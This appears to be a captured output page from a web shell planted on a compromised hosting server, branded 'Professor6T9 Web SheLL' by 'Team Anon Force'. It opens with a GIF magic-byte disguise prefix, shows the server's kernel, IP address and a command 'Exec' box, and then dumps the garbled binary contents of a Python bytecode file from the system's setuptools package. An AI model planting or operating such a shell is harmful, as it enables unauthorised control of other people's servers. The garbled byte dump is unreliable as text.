GIF89;aGIF89;aGIF89;a
Team Anon Force
https://t.me/Professor6T9x
Professor6T9 Web SheLL
Linux host69.registrar-servers.com 4.18.0-513.18.1.lve.2.el8.x86_64 #1 SMP Sat Mar 30 15:36:11 UTC 2024 x86_64
Apache
68.65.123.79
/
opt
/
alt
/
python312
/
lib
/
python3.12
/
site-packages
/
setuptools
/
_vendor
/
more_itertools
/
__pycache__
[ HOME ]
Exec
Submit
File Name : recipes.cpython-312.pyc
� ��_i�? � � � d Z ddlZddlmZ ddlmZmZmZmZm Z m Z mZmZm Z mZ ddlZddlmZmZmZ g d�Zd� Zd'd�Zd � Zd(d �Zd(d�Zd� Zefd �Zd� ZeZd� Zd� Z d� Z!d(d�Z"d� Z# ddlm$Z% d� Z$e#j e$_ d(d�Z'd� Z(d� Z)d� Z*d(d�Z+d(d�Z,d(d�Z-d)d�Z.dd�d �Z/d(d!�Z0d"� Z1d#� Z2d$� Z3d%� Z4d&� Z5y# e&$ r e#Z$Y �@w xY w)*a Imported from the recipes section of the itertools documentation. All functions taken from the recipes section of the itertools library docs [1]_. Some backward-compatible usability improvements have been made. .. [1] http://docs.python.org/library/itertools.html#recipes � N)�deque) �chain�combinations�count�cycle�groupby�islice�repeat�starmap�tee�zip_longest)� randrange�sample�choice)� all_equal�consume�convolve� dotproduct� first_true�flatten�grouper�iter_except�ncycles�nth�nth_combination�padnone�pad_none�pairwise� partition�powerset�prepend�quantify�#random_combination_with_replacement�random_combination�random_permutation�random_product� repeatfunc� roundrobin�tabulate�tail�take�unique_everseen�unique_justseenc �, � t t || � � S )z�Return first *n* items of the iterable as a list. >>> take(3, range(10)) [0, 1, 2] If there are fewer than *n* items in the iterable, all of them are returned. >>> take(10, range(3)) [0, 1, 2] )�listr ��n�iterables ��/builddir/build/BUILDROOT/alt-python312-setuptools-69.0.2-3.el8.x86_64/opt/alt/python312/lib/python3.12/site-packages/setuptools/_vendor/more_itertools/recipes.pyr+ r+ <